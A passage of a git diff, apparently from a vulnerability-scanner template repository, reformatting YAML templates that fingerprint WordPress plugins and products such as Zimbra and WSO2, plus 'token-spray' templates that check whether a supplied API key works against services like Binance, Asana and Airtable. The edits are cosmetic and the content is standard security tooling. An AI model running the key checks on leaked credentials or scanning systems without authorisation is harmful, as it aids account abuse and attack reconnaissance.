-13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-reset/readme.txt" diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 56dfdf4a59..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-reviews-plugin-for-google/readme.txt" diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..39ae656501 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-rollback/readme.txt" diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 2276545093..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-seopress/readme.txt" diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-sitemap-page/readme.txt" diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 27f6d46c2b..8e3b70586f 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-smushit/readme.txt" diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..64397ecbdb 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt" diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-super-cache/readme.txt" diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..c723509ebd 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-user-avatar/readme.txt" diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wpcf7-recaptcha/readme.txt" diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wpcf7-redirect/readme.txt" diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..58e5e828bf 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wpforms-lite/readme.txt" diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wps-hide-login/readme.txt" diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wpvivid-backuprestore/readme.txt" diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml index 9e069d2f7f..f717848161 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml @@ -14,7 +14,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/yith-woocommerce-compare/readme.txt" diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/yith-woocommerce-wishlist/readme.txt" diff --git a/http/technologies/workerman-websocket-detect.yaml b/http/technologies/workerman-websocket-detect.yaml index d1810a41d0..75f517c05e 100644 --- a/http/technologies/workerman-websocket-detect.yaml +++ b/http/technologies/workerman-websocket-detect.yaml @@ -8,8 +8,8 @@ info: - https://www.workerman.net/en/ - https://github.com/walkor/Workerman metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: "workerman" tags: tech,workerman,websocket diff --git a/http/technologies/wso2-products-detect.yaml b/http/technologies/wso2-products-detect.yaml index 3ba4f3c267..a719c63851 100644 --- a/http/technologies/wso2-products-detect.yaml +++ b/http/technologies/wso2-products-detect.yaml @@ -5,9 +5,9 @@ info: author: righettod severity: info description: Try to detect the presence of a WSO2 products instance via the version endpoint - tags: tech,wso2 metadata: max-request: 1 + tags: tech,wso2 http: - method: GET diff --git a/http/technologies/wuzhicms-detect.yaml b/http/technologies/wuzhicms-detect.yaml index 66ea0be6fb..67906fca99 100644 --- a/http/technologies/wuzhicms-detect.yaml +++ b/http/technologies/wuzhicms-detect.yaml @@ -5,19 +5,20 @@ info: author: pikpikcu severity: info description: Wuzhicms was detected. + remediation: Ensure you are using the latest version and that all security patches have been applied. reference: - https://www.cvedetails.com/vendor/17848/Wuzhicms.html classification: cwe-id: CWE-200 - remediation: Ensure you are using the latest version and that all security patches have been applied. - tags: tech,wuzhicms metadata: max-request: 1 + tags: tech,wuzhicms http: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word @@ -26,6 +27,7 @@ http: - "Powered by wuzhicms" - "五指CMS" condition: or + - type: status status: - 200 diff --git a/http/technologies/xerox-workcentre-detect.yaml b/http/technologies/xerox-workcentre-detect.yaml index 520008a054..47e1ac604c 100644 --- a/http/technologies/xerox-workcentre-detect.yaml +++ b/http/technologies/xerox-workcentre-detect.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"XEROX WORKCENTRE" tags: tech,xerox,workcentre diff --git a/http/technologies/yeswiki-detect.yaml b/http/technologies/yeswiki-detect.yaml index e058d59568..5cb0a54c2a 100644 --- a/http/technologies/yeswiki-detect.yaml +++ b/http/technologies/yeswiki-detect.yaml @@ -7,11 +7,11 @@ info: description: YesWiki panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"yeswiki" tags: yeswiki,panel,tech @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/technologies/ymhome-detect.yaml b/http/technologies/ymhome-detect.yaml index c2573d7b2b..d2180eaf62 100644 --- a/http/technologies/ymhome-detect.yaml +++ b/http/technologies/ymhome-detect.yaml @@ -16,6 +16,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/technologies/zap-api-detect.yaml b/http/technologies/zap-api-detect.yaml index 384ada3dd0..0fe6e11367 100644 --- a/http/technologies/zap-api-detect.yaml +++ b/http/technologies/zap-api-detect.yaml @@ -6,9 +6,9 @@ info: severity: info reference: - https://www.zaproxy.org/docs/api/ - tags: zap,tech metadata: max-request: 1 + tags: zap,tech http: - method: GET @@ -22,4 +22,4 @@ http: - 'ZAP API UI' - 'Welcome to the OWASP Zed Attack Proxy (ZAP)' - 'Access-Control-Allow-Headers: ZAP-Header' - condition: or \ No newline at end of file + condition: or diff --git a/http/technologies/zend-server-test-page.yaml b/http/technologies/zend-server-test-page.yaml index 46ddef0ba5..ddfe6b42e0 100644 --- a/http/technologies/zend-server-test-page.yaml +++ b/http/technologies/zend-server-test-page.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Zend Server Test Page" tags: tech,zend diff --git a/http/technologies/zerof-webserver-detect.yaml b/http/technologies/zerof-webserver-detect.yaml index bb09639c6e..4823d9bf35 100644 --- a/http/technologies/zerof-webserver-detect.yaml +++ b/http/technologies/zerof-webserver-detect.yaml @@ -4,9 +4,9 @@ info: name: ZEROF Web Server Detect author: princechaddha severity: info - tags: tech,zerof metadata: max-request: 1 + tags: tech,zerof http: - method: GET diff --git a/http/technologies/zimbra-detect.yaml b/http/technologies/zimbra-detect.yaml index 0dea485ba0..a251e6397f 100644 --- a/http/technologies/zimbra-detect.yaml +++ b/http/technologies/zimbra-detect.yaml @@ -5,9 +5,9 @@ info: author: UdinChan severity: info description: Send a GET request to js file on Zimbra server to obtain version information - tags: tech,zimbra metadata: max-request: 1 + tags: tech,zimbra http: - method: GET diff --git a/http/token-spray/api-1forge.yaml b/http/token-spray/api-1forge.yaml index ee71f38b07..d97e5357fc 100644 --- a/http/token-spray/api-1forge.yaml +++ b/http/token-spray/api-1forge.yaml @@ -8,11 +8,12 @@ info: reference: - https://1forge.com/api - https://github.com/daffainfo/all-about-apikey/tree/main/1forge - tags: token-spray,1forge metadata: max-request: 1 + tags: token-spray,1forge self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-abstract-company-enrichment.yaml b/http/token-spray/api-abstract-company-enrichment.yaml index 8505d93496..1701ce150c 100644 --- a/http/token-spray/api-abstract-company-enrichment.yaml +++ b/http/token-spray/api-abstract-company-enrichment.yaml @@ -8,11 +8,12 @@ info: reference: - https://www.abstractapi.com/api/company-enrichment - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-company-enrichment - tags: token-spray,abstractapi metadata: max-request: 1 + tags: token-spray,abstractapi self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-abstract-email-validation.yaml b/http/token-spray/api-abstract-email-validation.yaml index d0a75df3a6..87eb5c6367 100644 --- a/http/token-spray/api-abstract-email-validation.yaml +++ b/http/token-spray/api-abstract-email-validation.yaml @@ -8,11 +8,12 @@ info: reference: - https://www.abstractapi.com/api/email-verification-validation-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-email-validation - tags: token-spray,abstractapi metadata: max-request: 1 + tags: token-spray,abstractapi self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-abstract-exchange-rates.yaml b/http/token-spray/api-abstract-exchange-rates.yaml index 619cb14387..3fcd4ca1d2 100644 --- a/http/token-spray/api-abstract-exchange-rates.yaml +++ b/http/token-spray/api-abstract-exchange-rates.yaml @@ -8,11 +8,12 @@ info: reference: - https://www.abstractapi.com/api/exchange-rate-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-exchange-rates - tags: token-spray,abstractapi metadata: max-request: 1 + tags: token-spray,abstractapi self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-abstract-iban-validation.yaml b/http/token-spray/api-abstract-iban-validation.yaml index 2112a8438e..4dac9c3e5b 100644 --- a/http/token-spray/api-abstract-iban-validation.yaml +++ b/http/token-spray/api-abstract-iban-validation.yaml @@ -8,11 +8,12 @@ info: reference: - https://www.abstractapi.com/api/iban-validation - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-iban-validation - tags: token-spray,abstractapi metadata: max-request: 1 + tags: token-spray,abstractapi self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-abstract-image-processing.yaml b/http/token-spray/api-abstract-image-processing.yaml index 5bbdf8b821..8243db1873 100644 --- a/http/token-spray/api-abstract-image-processing.yaml +++ b/http/token-spray/api-abstract-image-processing.yaml @@ -8,11 +8,12 @@ info: reference: - https://www.abstractapi.com/api/image-processing-optimization-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-image-processing - tags: token-spray,abstractapi metadata: max-request: 1 + tags: token-spray,abstractapi self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-abstract-ip-geolocation.yaml b/http/token-spray/api-abstract-ip-geolocation.yaml index 629e1bf27b..cbdb721572 100644 --- a/http/token-spray/api-abstract-ip-geolocation.yaml +++ b/http/token-spray/api-abstract-ip-geolocation.yaml @@ -8,11 +8,12 @@ info: reference: - https://www.abstractapi.com/api/ip-geolocation-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-ip-geolocation - tags: token-spray,abstractapi metadata: max-request: 1 + tags: token-spray,abstractapi self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-abstract-phone-validation.yaml b/http/token-spray/api-abstract-phone-validation.yaml index 85cbdce95a..1a26ca016e 100644 --- a/http/token-spray/api-abstract-phone-validation.yaml +++ b/http/token-spray/api-abstract-phone-validation.yaml @@ -8,11 +8,12 @@ info: reference: - https://www.abstractapi.com/api/phone-validation-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-phone-validation - tags: token-spray,abstractapi metadata: max-request: 1 + tags: token-spray,abstractapi self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-abstract-public-holidays.yaml b/http/token-spray/api-abstract-public-holidays.yaml index fe8ee57858..0a52d520f5 100644 --- a/http/token-spray/api-abstract-public-holidays.yaml +++ b/http/token-spray/api-abstract-public-holidays.yaml @@ -8,11 +8,12 @@ info: reference: - https://www.abstractapi.com/api/holidays-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-public-holidays - tags: token-spray,abstractapi metadata: max-request: 1 + tags: token-spray,abstractapi self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-abstract-timezone.yaml b/http/token-spray/api-abstract-timezone.yaml index 64114074c8..2a4fbea1a9 100644 --- a/http/token-spray/api-abstract-timezone.yaml +++ b/http/token-spray/api-abstract-timezone.yaml @@ -8,11 +8,12 @@ info: reference: - https://www.abstractapi.com/api/time-date-timezone-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-timezone - tags: token-spray,abstractapi metadata: max-request: 1 + tags: token-spray,abstractapi self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-abstract-user-avatars.yaml b/http/token-spray/api-abstract-user-avatars.yaml index 5f74f356da..26cef34870 100644 --- a/http/token-spray/api-abstract-user-avatars.yaml +++ b/http/token-spray/api-abstract-user-avatars.yaml @@ -8,11 +8,12 @@ info: reference: - https://www.abstractapi.com/api/user-avatar-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-user-avatars - tags: token-spray,abstractapi metadata: max-request: 1 + tags: token-spray,abstractapi self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-abstract-vat-validation-rates.yaml b/http/token-spray/api-abstract-vat-validation-rates.yaml index 9a8a09bd54..23b1848b71 100644 --- a/http/token-spray/api-abstract-vat-validation-rates.yaml +++ b/http/token-spray/api-abstract-vat-validation-rates.yaml @@ -8,11 +8,12 @@ info: reference: - https://www.abstractapi.com/api/vat-validation-rates-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-vat-validation-rates - tags: token-spray,abstractapi metadata: max-request: 1 + tags: token-spray,abstractapi self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-abstract-website-screenshot.yaml b/http/token-spray/api-abstract-website-screenshot.yaml index df1233ba74..45b67d944d 100644 --- a/http/token-spray/api-abstract-website-screenshot.yaml +++ b/http/token-spray/api-abstract-website-screenshot.yaml @@ -8,11 +8,12 @@ info: reference: - https://www.abstractapi.com/api/website-screenshot-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-website-screenshot - tags: token-spray,abstractapi metadata: max-request: 1 + tags: token-spray,abstractapi self-contained: true + http: - method: GET path: @@ -24,4 +25,4 @@ http: words: - '"code":"validation_error"' - 'Reached error page' - condition: and \ No newline at end of file + condition: and diff --git a/http/token-spray/api-abuseipdb.yaml b/http/token-spray/api-abuseipdb.yaml index 8d5495aa12..dc89a54bc5 100644 --- a/http/token-spray/api-abuseipdb.yaml +++ b/http/token-spray/api-abuseipdb.yaml @@ -10,13 +10,14 @@ info: - https://github.com/daffainfo/all-about-apikey/tree/main/abuseipdb classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: token-spray,abuseipdb metadata: max-request: 1 + tags: token-spray,abuseipdb self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-accuweather.yaml b/http/token-spray/api-accuweather.yaml index dfd1976c21..6b7fd98156 100644 --- a/http/token-spray/api-accuweather.yaml +++ b/http/token-spray/api-accuweather.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://developer.accuweather.com/apis - tags: token-spray,accuweather metadata: max-request: 1 + tags: token-spray,accuweather self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-adafruit-io.yaml b/http/token-spray/api-adafruit-io.yaml index abee484bed..130af13d08 100644 --- a/http/token-spray/api-adafruit-io.yaml +++ b/http/token-spray/api-adafruit-io.yaml @@ -6,22 +6,23 @@ info: severity: info reference: - https://io.adafruit.com/api/docs/ - tags: token-spray,adafruit metadata: max-request: 1 + tags: token-spray,adafruit self-contained: true + http: - method: GET path: - "https://io.adafruit.com/api/v2/user" + headers: X-AIO-Key: "{{token}}" - matchers: - type: word part: body words: - '"username":' - '"id":' - condition: and \ No newline at end of file + condition: and diff --git a/http/token-spray/api-adoptapet.yaml b/http/token-spray/api-adoptapet.yaml index dbc58ea051..c3d7f96b5d 100644 --- a/http/token-spray/api-adoptapet.yaml +++ b/http/token-spray/api-adoptapet.yaml @@ -8,11 +8,12 @@ info: reference: - https://www.adoptapet.com/public/apis/pet_list.html - https://github.com/daffainfo/all-about-apikey/tree/main/adoptapet - tags: token-spray,adoptapet metadata: max-request: 1 + tags: token-spray,adoptapet self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-airtable.yaml b/http/token-spray/api-airtable.yaml index 1a278021dd..84d6f66ede 100644 --- a/http/token-spray/api-airtable.yaml +++ b/http/token-spray/api-airtable.yaml @@ -8,11 +8,12 @@ info: reference: - https://airtable.com/api - https://github.com/daffainfo/all-about-apikey/tree/main/airtable - tags: token-spray,airtable metadata: max-request: 1 + tags: token-spray,airtable self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-alchemy.yaml b/http/token-spray/api-alchemy.yaml index 2ba5fe7674..56dd1fba09 100644 --- a/http/token-spray/api-alchemy.yaml +++ b/http/token-spray/api-alchemy.yaml @@ -8,17 +8,18 @@ info: reference: - https://docs.alchemy.com/alchemy/ - https://github.com/daffainfo/all-about-apikey/tree/main/alchemy - tags: token-spray,alchemy metadata: max-request: 1 + tags: token-spray,alchemy self-contained: true + http: - method: POST path: - "https://eth-mainnet.alchemyapi.io/v2/{{token}}" - body: '{"jsonrpc":"2.0","method":"eth_blockNumber","params":[],"id":0}' + body: '{"jsonrpc":"2.0","method":"eth_blockNumber","params":[],"id":0}' matchers: - type: word part: body diff --git a/http/token-spray/api-alienvault.yaml b/http/token-spray/api-alienvault.yaml index 8363d6ea72..92678c5f14 100644 --- a/http/token-spray/api-alienvault.yaml +++ b/http/token-spray/api-alienvault.yaml @@ -8,11 +8,12 @@ info: reference: - https://otx.alienvault.com/api - https://github.com/daffainfo/all-about-apikey/tree/main/alienvault-open-threat-exchange - tags: token-spray,alienvault,exchange metadata: max-request: 1 + tags: token-spray,alienvault,exchange self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-amdoren.yaml b/http/token-spray/api-amdoren.yaml index f530fc8663..38882f242f 100644 --- a/http/token-spray/api-amdoren.yaml +++ b/http/token-spray/api-amdoren.yaml @@ -8,11 +8,12 @@ info: reference: - https://www.amdoren.com/currency-api/ - https://github.com/daffainfo/all-about-apikey/tree/main/amdoren - tags: token-spray,amdoren metadata: max-request: 1 + tags: token-spray,amdoren self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-aniapi.yaml b/http/token-spray/api-aniapi.yaml index c6523aebe5..69b16228da 100644 --- a/http/token-spray/api-aniapi.yaml +++ b/http/token-spray/api-aniapi.yaml @@ -8,18 +8,19 @@ info: reference: - https://aniapi.com/docs/authentication - https://github.com/daffainfo/all-about-apikey/tree/main/aniapi - tags: token-spray,aniapi metadata: max-request: 1 + tags: token-spray,aniapi self-contained: true + http: - method: GET path: - "https://api.aniapi.com/v1/auth/me" + headers: Authorization: Bearer {{token}} - matchers: - type: word part: body diff --git a/http/token-spray/api-api2convert.yaml b/http/token-spray/api-api2convert.yaml index a2aa65c229..e36d89ef28 100644 --- a/http/token-spray/api-api2convert.yaml +++ b/http/token-spray/api-api2convert.yaml @@ -8,11 +8,12 @@ info: reference: - https://www.api2convert.com/docs/index.html - https://github.com/daffainfo/all-about-apikey/tree/main/api2convert - tags: token-spray,api2convert metadata: max-request: 1 + tags: token-spray,api2convert self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-apiflash.yaml b/http/token-spray/api-apiflash.yaml index 75a3d696a0..7dde660fe1 100644 --- a/http/token-spray/api-apiflash.yaml +++ b/http/token-spray/api-apiflash.yaml @@ -8,11 +8,12 @@ info: reference: - https://apiflash.com/ - https://github.com/daffainfo/all-about-apikey/tree/main/apiflash - tags: token-spray,apiflash metadata: max-request: 1 + tags: token-spray,apiflash self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-apigee-edge.yaml b/http/token-spray/api-apigee-edge.yaml index 066d55a77d..5c8661e662 100644 --- a/http/token-spray/api-apigee-edge.yaml +++ b/http/token-spray/api-apigee-edge.yaml @@ -6,15 +6,17 @@ info: severity: info reference: - https://apidocs.apigee.com/apis - tags: token-spray,apigee metadata: max-request: 1 + tags: token-spray,apigee self-contained: true + http: - method: GET path: - "https://apimonitoring.enterprise.apigee.com/alerts" + headers: Authorization: Bearer {{token}} diff --git a/http/token-spray/api-appveyor.yaml b/http/token-spray/api-appveyor.yaml index 2bd819cf57..bf7078e962 100644 --- a/http/token-spray/api-appveyor.yaml +++ b/http/token-spray/api-appveyor.yaml @@ -6,23 +6,24 @@ info: severity: info reference: - https://www.appveyor.com/docs/api/ - tags: token-spray,appveyor metadata: max-request: 1 + tags: token-spray,appveyor self-contained: true + http: - method: GET path: - "https://ci.appveyor.com/api/roles" + headers: Content-Type: application/json Authorization: Bearer {{token}} - matchers: - type: word part: body words: - '"roleId":' - '"created":' - condition: and \ No newline at end of file + condition: and diff --git a/http/token-spray/api-asana.yaml b/http/token-spray/api-asana.yaml index ab5b9ded72..39d0ef4f75 100644 --- a/http/token-spray/api-asana.yaml +++ b/http/token-spray/api-asana.yaml @@ -8,18 +8,19 @@ info: reference: - https://developers.asana.com/docs/using-terminal - https://github.com/daffainfo/all-about-apikey/tree/main/asana - tags: token-spray,asana metadata: max-request: 1 + tags: token-spray,asana self-contained: true + http: - method: GET path: - "https://app.asana.com/api/1.0/users/me" + headers: Authorization: Bearer {{token}} - matchers: - type: word part: body diff --git a/http/token-spray/api-bhagavadgita.yaml b/http/token-spray/api-bhagavadgita.yaml index adf2a4827c..97a73b9023 100644 --- a/http/token-spray/api-bhagavadgita.yaml +++ b/http/token-spray/api-bhagavadgita.yaml @@ -8,11 +8,12 @@ info: reference: - https://docs.bhagavadgitaapi.in/ - https://github.com/daffainfo/all-about-apikey/tree/main/bhagavad-gita - tags: token-spray,bhagavadgita metadata: max-request: 1 + tags: token-spray,bhagavadgita self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-bible.yaml b/http/token-spray/api-bible.yaml index 080d2e7527..da6ae52af9 100644 --- a/http/token-spray/api-bible.yaml +++ b/http/token-spray/api-bible.yaml @@ -8,18 +8,19 @@ info: reference: - https://docs.api.bible - https://github.com/daffainfo/all-about-apikey/tree/main/api-bible - tags: token-spray,bible metadata: max-request: 1 + tags: token-spray,bible self-contained: true + http: - method: GET path: - "https://api.scripture.api.bible/v1/bibles/a6aee10bb058511c-02/verses/JHN.3.16?fums-version=3" + headers: api-key: "{{token}}" - matchers: - type: word part: body diff --git a/http/token-spray/api-binance.yaml b/http/token-spray/api-binance.yaml index 52964b7ca6..66922606ca 100644 --- a/http/token-spray/api-binance.yaml +++ b/http/token-spray/api-binance.yaml @@ -8,18 +8,19 @@ info: reference: - https://github.com/binance/binance-spot-api-docs/blob/master/rest-api.md - https://github.com/daffainfo/all-about-apikey/tree/main/binance - tags: token-spray,binance metadata: max-request: 1 + tags: token-spray,binance self-contained: true + http: - method: GET path: - "https://api.binance.com/api/v3/historicalTrades" + headers: X-MBX-APIKEY: "{{token}}" - matchers: - type: word part: body @@ -27,4 +28,4 @@ http: - '"id":' - '"price":' - '"quoteQty":' - condition: and \ No newline at end of file + condition: and diff --git a/http/token-spray/api-binaryedge.yaml b/http/token-spray/api-binaryedge.yaml index 1e58222327..ec99f5238a 100644 --- a/http/token-spray/api-binaryedge.yaml +++ b/http/token-spray/api-binaryedge.yaml @@ -9,18 +9,19 @@ info: reference: - https://binaryedge.io - https://docs.binaryedge.io - tags: recon,binaryedge,token-spray metadata: max-request: 1 + tags: recon,binaryedge,token-spray self-contained: true + http: - method: GET path: - https://api.binaryedge.io/v2/user/subscription + headers: X-Key: "{{token}}" - matchers: - type: word part: body diff --git a/http/token-spray/api-bingmaps.yaml b/http/token-spray/api-bingmaps.yaml index c6323b5d5a..1481d0eb86 100644 --- a/http/token-spray/api-bingmaps.yaml +++ b/http/token-spray/api-bingmaps.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://docs.microsoft.com/en-us/bingmaps/rest-services/locations/find-a-location-by-address - tags: token-spray,bing,maps,bingmaps metadata: max-request: 1 + tags: token-spray,bing,maps,bingmaps self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-bitcoinaverage.yaml b/http/token-spray/api-bitcoinaverage.yaml index 50df32864a..55ec61105a 100644 --- a/http/token-spray/api-bitcoinaverage.yaml +++ b/http/token-spray/api-bitcoinaverage.yaml @@ -8,11 +8,12 @@ info: reference: - https://apiv2.bitcoinaverage.com/ - https://github.com/daffainfo/all-about-apikey/tree/main/bitcoinaverage - tags: token-spray,bitcoinaverage metadata: max-request: 1 + tags: token-spray,bitcoinaverage self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-bitly.yaml b/http/token-spray/api-bitly.yaml index d624c988ff..d680ae5178 100644 --- a/http/token-spray/api-bitly.yaml +++ b/http/token-spray/api-bitly.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://dev.bitly.com/api-reference - tags: token-spray,bitly metadata: max-request: 1 + tags: token-spray,bitly self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-bitquery.yaml b/http/token-spray/api-bitquery.yaml index f352522d4e..471ff00d51 100644 --- a/http/token-spray/api-bitquery.yaml +++ b/http/token-spray/api-bitquery.yaml @@ -8,11 +8,12 @@ info: reference: - https://graphql.bitquery.io/ide - https://github.com/daffainfo/all-about-apikey/tree/main/bitquery - tags: token-spray,bitquery metadata: max-request: 1 + tags: token-spray,bitquery self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-bitrise.yaml b/http/token-spray/api-bitrise.yaml index 98314a5d8f..83ea7bcb9e 100644 --- a/http/token-spray/api-bitrise.yaml +++ b/http/token-spray/api-bitrise.yaml @@ -8,11 +8,12 @@ info: reference: - https://api-docs.bitrise.io/ - https://github.com/daffainfo/all-about-apikey/tree/main/bitrise - tags: token-spray,bitrise metadata: max-request: 1 + tags: token-spray,bitrise self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-blitapp.yaml b/http/token-spray/api-blitapp.yaml index d937d0ef1b..ffa2c969cb 100644 --- a/http/token-spray/api-blitapp.yaml +++ 